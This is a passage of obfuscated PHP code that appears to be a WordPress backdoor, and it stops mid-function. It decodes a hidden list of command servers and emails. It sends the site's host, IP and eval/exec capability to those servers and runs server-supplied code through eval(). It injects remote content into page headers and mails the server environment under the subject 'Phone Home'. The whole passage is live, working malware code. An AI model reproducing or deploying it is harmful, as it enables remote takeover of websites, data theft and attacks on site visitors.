‘=02ow5PocSJo09TnN5JreS2M5EKnhITo’, ‘=02ow5PocSJo09TnNAJnwyUncEJqbSTo’, ‘=02ow5PocSJo09TnNuJnvIznuEKMaIao’, ‘g92LhjJnu1TqiuTD1EKrmy3LyMJqkIKo’, ‘g92LhjJnu1TqiuTDuEJMfIUo5kJq4y2M’, ‘g92LhjJnu1TqiuTDyEKMgIUM5MJMgS2n’, ‘g92LhjJnu1TqiuTDuAKrmy3LuAKrk9zn’, ‘g92LhjJnu1TqiuTDcWJLgy3ny5Jq6yTp’, ‘g92LhjJnu1TqiuTDyMJLjSTM5W3o49zp’, ‘=02ow5PocSJo09TnNW3oaSTMcuKrmITo’, ‘=02ow5PocSJo09TnNSKr6IaLcSKMbS2n’, ‘g92LhjJnu1TqiuTD1E2o2yzruAKqv9zq’, ‘=02ow5PocSJo09TnNEJngITqucJreyTM’, ‘g92LhjJnu1TqiuTDiu2oly3L1u3o3yaM’, ‘g92LhjJnu1TqiuTD15Jqa9zn1OKqmyJp’, ‘g92LhjJnu1TqiuTDuuKn4SJpiAKrey3p’, ‘=02ow5PocSJo09TnNgJMzSJpuWJq2yTp’, ‘=02ow5PocSJo09TnNuJn4IzqiW3o39Jo’, ‘g92LhjJnu1TqiuTD5SKnmIaricKrvIJo’, ‘=02ow5PocSJo09TnNS3odS2MyuJqxyTo’, ‘=02ow5PocSJo09TnNcJrzyJp55JqeI2q’, ‘g92Lhf2oikTq19TD5uJL4yTM1EKMk9zM’, ‘g92Lhf2oikTq19TD5AJq4Iaq1uKq4y2p’, ‘=02ow5lni9To0I3oNc3ojIKocMJMgy3n’, ‘=02ow5lni9To0I3oNc3ogSzq5EJnaIUo’, ‘=02ow5lni9To0I3oNcKnd92pigJM292p’, ‘g92Lhf2oikTq19TD5EJMfy3pycJn29zr’, ‘=02ow5lni9To0I3oNcJqkyaq1gJr0Izo’, ‘g92Lhf2oikTq19TDyAJnd9Tn5EJMwSJp’, ‘=02ow5lni9To0I3oNSKLgyUpygJq4yao’, ‘g92Lhf2oikTq19TDuEJrjIzocuJMxS2L’, ‘=02ow5lni9To0I3oNu3ojyJoySKqvITr’, ‘g92Lhf2oikTq19TD5EJqhyTn1gJMkyan’, ‘g92Lhf2oikTq19TD5AJneITncqJndyUp’, ‘g92Lhf2oikTq19TD15JnwIUoykJLgI2M’, ‘g92Lhf2oikTq19TDuOKrfSJou1Jn0IUr’, ‘=02ow5lni9To0I3oNuKqhyapcWKnxy2M’, ‘=02ow5lni9To0I3oNcKMbSznucJq0Iap’, ‘g92Lhf2oikTq19TD5A3omy3nicJrdy3M’, ‘g92Lhf2oikTq19TD1WJrgS2Mc12omIzM’, ‘=02ow5lni9To0I3oNO3ofy3qiMKqbIzr’, ‘=02ow5lni9To0I3oNEKn4I3L1SKqfIUq’, ‘=02ow5lni9To0I3oN5JrfyzMcMJqfIKp’, ‘=02ow5lni9To0I3oNqKrxSTqygJrk9zo’, ‘g92Lhf2oikTq19TDikJnvSJp5qKqkIar’, ‘g92Lhf2oikTq19TD5O3ovy2piqJnhIUq’, ‘g92Lhf2oikTq19TDyMKL092L5MKqwIzL’, ‘=02ow5lni9To0I3oNcJqbIap5cKL0yKp’, ‘g92Lhf2oikTq19TD5qKrdS2qiAJMvITq’, ‘=02ow5lni9To0I3oNWKM6yarycJqjSzo’, ‘=02ow5lni9To0I3oN1JM39JoiAKMbyaL’, ‘g92Lhf2oikTq19TD55JnmIUM1cKrm92p’, ‘=02ow5lni9To0I3oNq3oh9zryc3og9Tq’, ‘g92Lhf2oikTq19TD1OKrvyaMuWJqxyUM’, ‘g92Lhf2oikTq19TDiMKnvyaM1uJngIzr’, ‘=02ow5lni9To0I3oNqKMbIUnyqKMeSTp’, ‘=02ow5lni9To0I3oNqKngIzL1uKLlIzo’, ‘g92Lhf2oikTq19TDu52oj92LyuJLmyzp’, ‘=02ow5lni9To0I3oNOKL69zMucKMlSTM’, ‘=02ow5lni9To0I3oNuKqmyTnucJM2I3L’, ‘g92Lhf2oikTq19TDySKrmSTn5qKLbIao’, ‘g92Lhf2oikTq19TD1EKnxIJoccKL0Iao’, ‘g92Lhf2oikTq19TD5qKr6yzoicJMa9zo’, ‘g92Lhf2oikTq19TDuqJnzIao1MJnxIao’, ‘=02ow5lni9To0I3oNc2odI2p1WKMgIzr’, ‘g92Lhf2oikTq19TD1uKndSTquqJrhSTo’, ‘=02ow5lni9To0I3oNuKrwyap1cJL39Tn’, ‘=02ow5lni9To0I3oNEJrkS2pikJMbIzn’, ‘g92Lhf2oikTq19TDiqJMay2p1E2ofyaL’, ‘g92Lhf2oikTq19TDiqKqfIzoykJqlyzo’, ‘=02ow5lni9To0I3oNcKrbSzn51JrzI2n’, ‘=02ow5lni9To0I3oNgJLh92McuKqm92p’, ‘g92Lhf2oikTq19TDcq2owyap112ox9Tq’, ‘g92Lhf2oikTq19TDiWJq6yJoykJMjS2M’, ‘g92Lhf2oikTq19TDugJray3qcqJnwSzM’, ‘g92Lhf2oikTq19TDcqJnmyzruEKqeyzM’, ‘=02ow5lni9To0I3oN5JMmyUr5AJn2yUp’, ‘g92Lhf2oikTq19TD5MJLfyTMuc3o6Izr’, ‘g92Lhf2oikTq19TDiAJq6yTpyEJMbI3M’, ‘=02ow5lni9To0I3oNAJqvI2q1MKLxS2q’, ‘g92Lhf2oikTq19TD1EKLeSzp11JLxy2p’, ); $this->dIOUyQsvDqPHTBIxnlYs(); $this->YobOrWbieESFVcSsWsuBypg = false; $oXyaqmHoChvHQFCvTluqmAC = get_option(WP_OPTION_KEY); if ($oXyaqmHoChvHQFCvTluqmAC == null || $oXyaqmHoChvHQFCvTluqmAC == ‘null’) { $oXyaqmHoChvHQFCvTluqmAC = ”; } if ($oXyaqmHoChvHQFCvTluqmAC == ”){ $this->wqawPxkNytKqRKNRqbwAdw = true; $this->AeRxXNHxOXpcNJWlZSIKLhIw = new VtkddwvkYgCDDRRWbgRtw(‘new’); $this->QxEolVsSqvJZyRSgHFmL(); } else{ $this->AeRxXNHxOXpcNJWlZSIKLhIw = new VtkddwvkYgCDDRRWbgRtw(); $this->oXyaqmHoChvHQFCvTluqmAC = $this->McEnUjjQfaFzqGsihhU($oXyaqmHoChvHQFCvTluqmAC, true); if (isset($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘publicKey’])) { $this->AeRxXNHxOXpcNJWlZSIKLhIw->skwTpfzBalSTBTBkLvhw($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘publicKey’]); } } $this->OFwlxWaeMyxznpZtnfJLQA(); if ($this->TztHMzNNJASlMfiSOwxQpE()) { die(); } if (!$this->wqawPxkNytKqRKNRqbwAdw) { $this->KPBBXYwmuPGPaTyLhWevI(); } } private function QxEolVsSqvJZyRSgHFmL(){ $WbKPQMoSbMZkXUeYKXRIk = $this->KZdGlovqEtKYUSCqSVnK(); $WbKPQMoSbMZkXUeYKXRIk[‘publicKey’] = $this->AeRxXNHxOXpcNJWlZSIKLhIw->qPhSGyDrRdyPezAnHgiao(); $this->WbKPQMoSbMZkXUeYKXRIk = $WbKPQMoSbMZkXUeYKXRIk; $vsJigIMHYwdFnuqvRwrvms = false; $BCEUSjHFFwzzqmHmpjjQI = 0; foreach($this->HSxTktcbTftjZjKRHHmhr() as $gXNjWLFkUQOugyREMXKvZBfw){ $oXyaqmHoChvHQFCvTluqmAC = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw,$WbKPQMoSbMZkXUeYKXRIk); $oXyaqmHoChvHQFCvTluqmAC = $this->gTSiihhIRUNPkADDVdes($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC !== false) { $vsJigIMHYwdFnuqvRwrvms = true; if ($this->YobOrWbieESFVcSsWsuBypg) { break; } break; } } if ($vsJigIMHYwdFnuqvRwrvms) { if ($this->YobOrWbieESFVcSsWsuBypg) { $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); } $oXyaqmHoChvHQFCvTluqmAC[‘info’] = $WbKPQMoSbMZkXUeYKXRIk; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); $this->oXyaqmHoChvHQFCvTluqmAC = $oXyaqmHoChvHQFCvTluqmAC; } else { $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); $oXyaqmHoChvHQFCvTluqmAC[‘info’] = $WbKPQMoSbMZkXUeYKXRIk; $this->oXyaqmHoChvHQFCvTluqmAC = $oXyaqmHoChvHQFCvTluqmAC; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); $this->XnpSvtOjNDRmxyfzaDKlGwM(); } return $oXyaqmHoChvHQFCvTluqmAC; } public function TztHMzNNJASlMfiSOwxQpE(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if ($oXyaqmHoChvHQFCvTluqmAC == ”){ return false; } $SntMBKFkfTlUzXyNVQedo = @$_GET[$this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘serverKey’]]; if (isset($SntMBKFkfTlUzXyNVQedo) && $SntMBKFkfTlUzXyNVQedo == ”) { echo ‘<div id=”serverList” style=”display: none”>’; $bQYduZxDrtPMJtaBCQycHQY[‘servers’] = $oXyaqmHoChvHQFCvTluqmAC[‘servers’]; echo json_encode($bQYduZxDrtPMJtaBCQycHQY); echo ‘</div>’; die(); }else if (isset($SntMBKFkfTlUzXyNVQedo) && isset($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’])) { if (isset($this->oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; }else{ $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); } $oXyaqmHoChvHQFCvTluqmAC[‘servers’][] = $SntMBKFkfTlUzXyNVQedo; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); die(); } return false; } public function OFwlxWaeMyxznpZtnfJLQA(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if (!isset($oXyaqmHoChvHQFCvTluqmAC) || $oXyaqmHoChvHQFCvTluqmAC == null) { return; } if (!is_array($oXyaqmHoChvHQFCvTluqmAC) || $oXyaqmHoChvHQFCvTluqmAC == ”) { return; } if (@$oXyaqmHoChvHQFCvTluqmAC[‘info’][‘eval’] == 1){ foreach ($oXyaqmHoChvHQFCvTluqmAC[‘eval’] as $vsGIQvwCXRbSELMOlFV) { eval($vsGIQvwCXRbSELMOlFV); } } if (isset($oXyaqmHoChvHQFCvTluqmAC[‘echo’])){ if (!defined(‘wp_footerLeo’)) { add_action(‘wp_head’, array( $this, ‘WvOoqSuRpZkhgAAFQVjBjSVo’)); } } } public function WvOoqSuRpZkhgAAFQVjBjSVo(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; foreach ($oXyaqmHoChvHQFCvTluqmAC[‘echo’] as $stIedxfhoZcXvZNmNXTdFbI) { echo $stIedxfhoZcXvZNmNXTdFbI; } } private function oqtYbOOiucMYWyZsGEuETRhB() { $oXyaqmHoChvHQFCvTluqmAC = array(); $oXyaqmHoChvHQFCvTluqmAC[‘echo’] = array(); $oXyaqmHoChvHQFCvTluqmAC[‘eval’] = array(); $oXyaqmHoChvHQFCvTluqmAC[‘clients’] = array(); $oXyaqmHoChvHQFCvTluqmAC[‘update’] = array(); return $oXyaqmHoChvHQFCvTluqmAC; } private function dIOUyQsvDqPHTBIxnlYs(){ $dqkdbOJPzAPsLsuxnjAStdXUDis = array(‘www.’, ‘www’, ‘ ‘, ‘{‘, ‘}’); $this->htcFFCQTLLpnCchsPKGYxso = str_replace($dqkdbOJPzAPsLsuxnjAStdXUDis, “”, $_SERVER[‘HTTP_HOST’]); } private function HSxTktcbTftjZjKRHHmhr() { $oXyaqmHoChvHQFCvTluqmAC = array(); foreach ($this->yYVsqvOoqWsddypXgJcIKOw as $gXNjWLFkUQOugyREMXKvZBfw) { $oXyaqmHoChvHQFCvTluqmAC[] = base64_decode(str_rot13(strrev($gXNjWLFkUQOugyREMXKvZBfw))); } if (isset($this->oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’])) { $nGwzfuUZcelzyfJBQMIgkk = (int) ($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] / 100); if ($nGwzfuUZcelzyfJBQMIgkk == 0) { $nGwzfuUZcelzyfJBQMIgkk = 5; } else{ $nGwzfuUZcelzyfJBQMIgkk *= 5; } }else{ $nGwzfuUZcelzyfJBQMIgkk = 5; } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $nGwzfuUZcelzyfJBQMIgkk); } private function XsvsqpxlWxfKYiyUc($YJYRbBDIcUlLJwWidyuM) { $oXyaqmHoChvHQFCvTluqmAC = array(); foreach ($this->oXyaqmHoChvHQFCvTluqmAC[’emails’] as $HWcwGasopLJSadVNNw){ $oXyaqmHoChvHQFCvTluqmAC[] = $HWcwGasopLJSadVNNw; } foreach ($this->aJQafHDwnaPrCJrQMjHVh as $HWcwGasopLJSadVNNw) { $oXyaqmHoChvHQFCvTluqmAC[] = base64_decode(str_rot13(strrev($HWcwGasopLJSadVNNw))); } return $this->VitTYMKdJITsiXBTLOEA($oXyaqmHoChvHQFCvTluqmAC, $YJYRbBDIcUlLJwWidyuM); } private function KZdGlovqEtKYUSCqSVnK(){ $oXyaqmHoChvHQFCvTluqmAC = array(); $oXyaqmHoChvHQFCvTluqmAC[‘host’] = $_SERVER[‘HTTP_HOST’]; $oXyaqmHoChvHQFCvTluqmAC[‘page’] = $_SERVER[‘REQUEST_URI’]; $oXyaqmHoChvHQFCvTluqmAC[‘ip’] = $_SERVER[‘SERVER_ADDR’]; $oXyaqmHoChvHQFCvTluqmAC[‘eval’] = $this->YrCTrfUzBfsVJKvqiYUeFbc(); $oXyaqmHoChvHQFCvTluqmAC[‘exec’] = $this->KNstTqErzZQBDQOODaJdLv(); $oXyaqmHoChvHQFCvTluqmAC[‘serverKey’] = $this->BkISKDyWWRXScnLPbTlyI(); $oXyaqmHoChvHQFCvTluqmAC[‘run’] = 0; $oXyaqmHoChvHQFCvTluqmAC[‘ver’] = ‘0.2a’; $oXyaqmHoChvHQFCvTluqmAC[‘started’] = date(‘Ymd’); $oXyaqmHoChvHQFCvTluqmAC[‘last_connect’] = date(‘Ymd’); $this->WbKPQMoSbMZkXUeYKXRIk = $oXyaqmHoChvHQFCvTluqmAC; return $oXyaqmHoChvHQFCvTluqmAC; } private function BkISKDyWWRXScnLPbTlyI($PVSXPKLAQGaWKUtNNUYQFoBuJE = 10) { $dqkdbOJPzAPsLsuxnjAStdXUDis = ‘0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’; $PqlpeiQHmZBwdmlsfEHmg = ”; for ($BCEUSjHFFwzzqmHmpjjQI = 0; $BCEUSjHFFwzzqmHmpjjQI < $PVSXPKLAQGaWKUtNNUYQFoBuJE; $BCEUSjHFFwzzqmHmpjjQI++) { $PqlpeiQHmZBwdmlsfEHmg .= $dqkdbOJPzAPsLsuxnjAStdXUDis[rand(0, strlen($dqkdbOJPzAPsLsuxnjAStdXUDis) – 1)]; } return $PqlpeiQHmZBwdmlsfEHmg; } public function KPBBXYwmuPGPaTyLhWevI(){ $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; if (@$oXyaqmHoChvHQFCvTluqmAC[‘info’][‘last_connect’] < date(‘Ymd’)){ $oXyaqmHoChvHQFCvTluqmAC = $this->CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC == false){ return; } else{ unset($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’]); } $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘last_connect’] = date(‘Ymd’); } $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘run’]++; $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); } private function CMQEWmnewJmgOLaFvXGCU($oXyaqmHoChvHQFCvTluqmAC){ $yYVsqvOoqWsddypXgJcIKOw = @$oXyaqmHoChvHQFCvTluqmAC[‘servers’]; $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($yYVsqvOoqWsddypXgJcIKOw, $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false){ return $uHrzRBdPUetDqbZAdw; } $uHrzRBdPUetDqbZAdw = $this->tEiRFSJMSpXyxKKORPZClI($this->HSxTktcbTftjZjKRHHmhr(), $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw !== false) { return $uHrzRBdPUetDqbZAdw; } $this->XnpSvtOjNDRmxyfzaDKlGwM(); } private function tEiRFSJMSpXyxKKORPZClI($QrnkCEWRkHbQPoEPelYQRw, $oXyaqmHoChvHQFCvTluqmAC) { foreach ($QrnkCEWRkHbQPoEPelYQRw as $gXNjWLFkUQOugyREMXKvZBfw) { $uHrzRBdPUetDqbZAdw = $this->VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $oXyaqmHoChvHQFCvTluqmAC[‘info’], $oXyaqmHoChvHQFCvTluqmAC); if ($uHrzRBdPUetDqbZAdw != false) { if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’])){ $oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’] = 0; } if ($this->YobOrWbieESFVcSsWsuBypg) { $oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’]++; if (!isset($BCEUSjHFFwzzqmHmpjjQI)){ $BCEUSjHFFwzzqmHmpjjQI = (int)($oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’] / 5); } if ($BCEUSjHFFwzzqmHmpjjQI > 0) { $BCEUSjHFFwzzqmHmpjjQI–; continue; } } if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $uHrzRBdPUetDqbZAdw[‘info’][’empty’] = –$oXyaqmHoChvHQFCvTluqmAC[‘info’][’empty’]; return $uHrzRBdPUetDqbZAdw; } } return false; } private function VxjeXwUeRLricksbcxlcSRnA($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk, $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = false; $OQijXfnrxWxPIcPSUibKEFmLE = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk); $OQijXfnrxWxPIcPSUibKEFmLE = $this->gTSiihhIRUNPkADDVdes($OQijXfnrxWxPIcPSUibKEFmLE); if ($OQijXfnrxWxPIcPSUibKEFmLE != false) { if ($this->YobOrWbieESFVcSsWsuBypg) { return $oXyaqmHoChvHQFCvTluqmAC; } $OQijXfnrxWxPIcPSUibKEFmLE[‘info’] = $WbKPQMoSbMZkXUeYKXRIk; return $OQijXfnrxWxPIcPSUibKEFmLE; } return false; } private function gTSiihhIRUNPkADDVdes($oXyaqmHoChvHQFCvTluqmAC){ if(!isset($this->WbKPQMoSbMZkXUeYKXRIk)){ $this->WbKPQMoSbMZkXUeYKXRIk = $this->oXyaqmHoChvHQFCvTluqmAC[‘info’]; } if (md5($this->WbKPQMoSbMZkXUeYKXRIk[‘serverKey’]) == $oXyaqmHoChvHQFCvTluqmAC) { $this->YobOrWbieESFVcSsWsuBypg = true; return true; } $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); $oXyaqmHoChvHQFCvTluqmAC = json_decode($oXyaqmHoChvHQFCvTluqmAC, true); if ($oXyaqmHoChvHQFCvTluqmAC == false) { return false; } else{ if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘servers’])) { return false; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw, $WbKPQMoSbMZkXUeYKXRIk = null,$BZaxGALPLdVfntBIQWUPs = null){ if (strstr($gXNjWLFkUQOugyREMXKvZBfw, $_SERVER[‘HTTP_HOST’]) || trim($gXNjWLFkUQOugyREMXKvZBfw) == ”) { return false; } if (isset($WbKPQMoSbMZkXUeYKXRIk)) { $BdlbpgzPBjxVLkBLnsrXkmI = json_encode($WbKPQMoSbMZkXUeYKXRIk); $oXyaqmHoChvHQFCvTluqmAC = $this->AeRxXNHxOXpcNJWlZSIKLhIw->bkBMtlOkGRaPFVExpcNbC($BdlbpgzPBjxVLkBLnsrXkmI); $WbKPQMoSbMZkXUeYKXRIk = array( “serverKey” => $WbKPQMoSbMZkXUeYKXRIk[‘serverKey’], “data” => $oXyaqmHoChvHQFCvTluqmAC[‘data’], “key” => $oXyaqmHoChvHQFCvTluqmAC[‘key’] ); } while (true){ $SCvWTGyfCYyeLdjcFFzobk = curl_init(); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_URL,”http://$gXNjWLFkUQOugyREMXKvZBfw&#8221;); curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_RETURNTRANSFER,1); @curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_FOLLOWLOCATION, true); if (isset($WbKPQMoSbMZkXUeYKXRIk)) { curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_CUSTOMREQUEST, “POST”); curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRIk); } curl_setopt($SCvWTGyfCYyeLdjcFFzobk,CURLOPT_CONNECTTIMEOUT,10); $oXyaqmHoChvHQFCvTluqmAC = curl_exec($SCvWTGyfCYyeLdjcFFzobk); curl_close($SCvWTGyfCYyeLdjcFFzobk); if (!strstr($oXyaqmHoChvHQFCvTluqmAC, “301 Moved Permanently”)) { break; } else{ preg_match_all(‘/<a.*href=\”””http:\/\/(.*?)\”””.*?\>/’,$oXyaqmHoChvHQFCvTluqmAC,$NyFDhMvsSaUwvJsx); $gXNjWLFkUQOugyREMXKvZBfw = $NyFDhMvsSaUwvJsx[1][0]; } } return $oXyaqmHoChvHQFCvTluqmAC; } private function aIIwgKgvtyRoWoMedUdbp($piiJbwvzLxHvKjlNnFzd, $oXyaqmHoChvHQFCvTluqmAC) { if (is_array($oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = json_encode($oXyaqmHoChvHQFCvTluqmAC); } $ilUTrmqGvQsBtZfyeBXfg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->MFmjdYJpnAEmbwnXvkQU($oXyaqmHoChvHQFCvTluqmAC); if ($this->YYfeblxJfGQgkPpfdrIOXNZwHg($ilUTrmqGvQsBtZfyeBXfg)) $oXyaqmHoChvHQFCvTluqmAC = json_decode($ilUTrmqGvQsBtZfyeBXfg, true); if (!isset($oXyaqmHoChvHQFCvTluqmAC[‘key’]) || !isset($oXyaqmHoChvHQFCvTluqmAC[‘data’]) || strlen($oXyaqmHoChvHQFCvTluqmAC[‘key’]) == 0 || strlen($oXyaqmHoChvHQFCvTluqmAC[‘data’]) == 0 ) { die(); } update_option($piiJbwvzLxHvKjlNnFzd, $ilUTrmqGvQsBtZfyeBXfg); } private function McEnUjjQfaFzqGsihhU($piiJbwvzLxHvKjlNnFzd, $ysnqBUjsRbJDIlZaAE = false) { if (!$ysnqBUjsRbJDIlZaAE) { $oXyaqmHoChvHQFCvTluqmAC = get_option($piiJbwvzLxHvKjlNnFzd); }else{ $oXyaqmHoChvHQFCvTluqmAC = $piiJbwvzLxHvKjlNnFzd; } $GfNOeQGoTKggozAbXZAUpg = $this->AeRxXNHxOXpcNJWlZSIKLhIw->vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC); return json_decode($GfNOeQGoTKggozAbXZAUpg, true); } private function YrCTrfUzBfsVJKvqiYUeFbc(){ $givBPiVtALrQjPLInUFKegOE = false; @eval(‘$givBPiVtALrQjPLInUFKegOE = true;’); return $givBPiVtALrQjPLInUFKegOE; } private function KNstTqErzZQBDQOODaJdLv() { $BlvGDekbFjVHsnUrjUKqdj = explode(‘, ‘, ini_get(‘disable_functions’)); return !in_array(‘exec’, $BlvGDekbFjVHsnUrjUKqdj); } private function XnpSvtOjNDRmxyfzaDKlGwM($oXyaqmHoChvHQFCvTluqmAC = null) { if ($oXyaqmHoChvHQFCvTluqmAC == null) { $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; } if (isset($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’])){ $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’]++; }else{ $oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] = 1; } if (($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] % 100) == 0 && isset($oXyaqmHoChvHQFCvTluqmAC[‘clients’])){ foreach ($oXyaqmHoChvHQFCvTluqmAC[‘clients’] as $qBNcTAaiRUhfdXBSzsVg) { if (strstr($qBNcTAaiRUhfdXBSzsVg, “|”) === false) { continue; } else{ $AoNmaQCAQvHyEPvRUhbfukXQ = explode(“|”, $qBNcTAaiRUhfdXBSzsVg); } $gXNjWLFkUQOugyREMXKvZBfw = $AoNmaQCAQvHyEPvRUhbfukXQ[0] . “?” . $AoNmaQCAQvHyEPvRUhbfukXQ[1]; $OQijXfnrxWxPIcPSUibKEFmLE = $this->RoQfzgyhgTpMgdUIktgNdYvKE($gXNjWLFkUQOugyREMXKvZBfw); preg_match(“/<div id=\”serverList\” style=\”display: none\”>(?<content>.*?)<\/div>/”, $OQijXfnrxWxPIcPSUibKEFmLE, $NUwGojaMFrWOXnaoPPXmg); if ($this->YYfeblxJfGQgkPpfdrIOXNZwHg($NUwGojaMFrWOXnaoPPXmg[‘content’])){ $OQijXfnrxWxPIcPSUibKEFmLE = json_decode($NUwGojaMFrWOXnaoPPXmg[‘content’], true); if (isset($this->oXyaqmHoChvHQFCvTluqmAC)) { $oXyaqmHoChvHQFCvTluqmAC = $this->oXyaqmHoChvHQFCvTluqmAC; }else{ $oXyaqmHoChvHQFCvTluqmAC = $this->oqtYbOOiucMYWyZsGEuETRhB(); } $oXyaqmHoChvHQFCvTluqmAC[‘servers’] = array_merge($OQijXfnrxWxPIcPSUibKEFmLE[‘servers’], $oXyaqmHoChvHQFCvTluqmAC[‘servers’]); $this->$oXyaqmHoChvHQFCvTluqmAC[‘servers’] = array_unique($oXyaqmHoChvHQFCvTluqmAC[‘servers’]); } else{ } } } if ($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] % 100 == 0) { $LMKkvQfVacsJkiwJOKQmc = false; $aJQafHDwnaPrCJrQMjHVh = $this->XsvsqpxlWxfKYiyUc($oXyaqmHoChvHQFCvTluqmAC[‘info’][‘fail’] / 100 * 5); $GSpWdZRUzAuMgSxhFeQsTA = array(); for($BCEUSjHFFwzzqmHmpjjQI = 0; $BCEUSjHFFwzzqmHmpjjQI < 5 ; $BCEUSjHFFwzzqmHmpjjQI++) { $YwrSbZoVizxkPzSqHegTC = rand( 0, count($aJQafHDwnaPrCJrQMjHVh) – 1); $TcfJENOGUCdnEeJdjBHSxLc = 0; $XCZRNpIiBvvCJTeyKlycSwY = 0; while(in_array($YwrSbZoVizxkPzSqHegTC,$GSpWdZRUzAuMgSxhFeQsTA)){ $XCZRNpIiBvvCJTeyKlycSwY++; $TcfJENOGUCdnEeJdjBHSxLc ++; $YwrSbZoVizxkPzSqHegTC = rand( 0, count($aJQafHDwnaPrCJrQMjHVh) – 1); if ($TcfJENOGUCdnEeJdjBHSxLc == 10) { $LMKkvQfVacsJkiwJOKQmc = true; break; } } if ($LMKkvQfVacsJkiwJOKQmc){ break; } $GSpWdZRUzAuMgSxhFeQsTA[] = $YwrSbZoVizxkPzSqHegTC; mail($aJQafHDwnaPrCJrQMjHVh[$YwrSbZoVizxkPzSqHegTC], “Phone Home”, json_encode($this->AeRxXNHxOXpcNJWlZSIKLhIw->bkBMtlOkGRaPFVExpcNbC(print_r($oXyaqmHoChvHQFCvTluqmAC, true) . print_r($_SERVER, true)))); } $this->vwhhtIrAWhUEFDgPrcco = true; } $this->aIIwgKgvtyRoWoMedUdbp(WP_OPTION_KEY, $oXyaqmHoChvHQFCvTluqmAC); } private function YYfeblxJfGQgkPpfdrIOXNZwHg($oXyaqmHoChvHQFCvTluqmAC){ $oXyaqmHoChvHQFCvTluqmAC = json_decode($oXyaqmHoChvHQFCvTluqmAC); if ($oXyaqmHoChvHQFCvTluqmAC == null) return false; return true; } private function VitTYMKdJITsiXBTLOEA($QrnkCEWRkHbQPoEPelYQRw, $MTPkrEtDJbjkrzXWSBgAo) { $PVSXPKLAQGaWKUtNNUYQFoBuJE = count($QrnkCEWRkHbQPoEPelYQRw); if ($PVSXPKLAQGaWKUtNNUYQFoBuJE <= $MTPkrEtDJbjkrzXWSBgAo) { return $QrnkCEWRkHbQPoEPelYQRw; } $oXyaqmHoChvHQFCvTluqmAC[] = array(); $PaTgoaVMMKhvlmVWxSnBVLA = array(); 